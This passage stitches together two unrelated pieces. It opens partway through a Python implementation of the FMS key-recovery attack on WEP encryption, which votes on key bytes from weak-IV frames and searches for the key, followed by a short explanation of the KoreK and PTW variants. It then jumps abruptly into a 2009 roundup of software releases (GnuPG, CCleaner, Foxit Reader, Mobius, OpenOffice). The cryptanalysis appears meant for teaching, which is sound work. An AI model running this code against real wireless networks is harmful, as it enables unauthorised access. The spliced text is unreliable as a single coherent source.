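    a = len(prefix)
    votes = [0] * 256
    for iv, c0 in frames:
        s, j = ksa(list(iv) + list(prefix), a + 3)
        x = s[1]
        if x < a + 3 and (x + s[x]) & 0xFF == a + 3:
            ks0 = c0 ^ SNAP0
            votes[(s.index(ks0) - j - s[a + 3]) & 0xFF] += 1
    return votes


def key_fits(key, frames):
    """A candidate key is right iff it decrypts the first byte of every frame to 0xAA."""
    return all(rc4_first_byte(iv + key) ^ c0 == SNAP0 for iv, c0 in frames)


def recover(frames, keylen=5, fudge=3, prefix=b""):
    """Depth-first search over the top 'fudge' vote-getters per byte, verified at the leaves."""
    if len(prefix) == keylen:
        return prefix if key_fits(prefix, frames[:64]) else None
    votes = vote(frames, prefix)
    for cand in sorted(range(256), key=lambda k: -votes[k])[:fudge]:
        found = recover(frames, keylen, fudge, prefix + bytes([cand]))
        if found is not None:
            return found
    return None


if __name__ == "__main__":
    frames = capture(SECRET_KEY)
    print("recovered:", recover(frames).hex(), "expected:", SECRET_KEY.hex())
```

The `vote` routine only trusts frames that pass the resolved-IV test, which is why weak-IV filtering on access points (skipping IVs of this form) blunted FMS in practice; the KoreK attacks add more IV classes with their own correlations, and PTW drops the weak-IV requirement altogether, which is where the large reduction in needed packets comes from.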

On Sept 4th, GnuPG 2.0.13 & 1.4.10 were released. The GNU Privacy Guard (GnuPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data, create digital signatures, help with authentication for Secure Shell and provide a framework for public key cryptography. Check the announce notes for both 2.0.13 & 1.4.10 for all the change details.

On Sept 3rd, CCleaner v2.23.999 was released. CCleaner is a freeware system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. This version has improved Opera 10 support. Check the version history for all the change details.

On Sept 3rd, Foxit Reader was released. Foxit Reader is a free PDF document viewer with an incredibly small size, very fast launch speed and a rich feature set. Its core function is compatible with PDF Standard 1.7. This release fixes at least two issues:
  • The reported crash when viewing certain PDF files has been fixed.
  • Fixed an issue where Foxit Reader would not launch on systems without the Microsoft Visual C++ 2005 Redistributable installed.
On Sept 2nd, Mobius Forensic Toolkit 0.4.7 was released. Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Check the release notes for the change details.

On Sept 1st, OpenOffice 3.1.1 was released. OpenOffice.org 3 is the leading open-source office software suite for word processing, spreadsheets, presentations, graphics, databases and more. This version is mostly a bug-fix release without a host of new features, but it does address two highly critical Word document table-parsing vulnerabilities. Check the release notes for all the change details.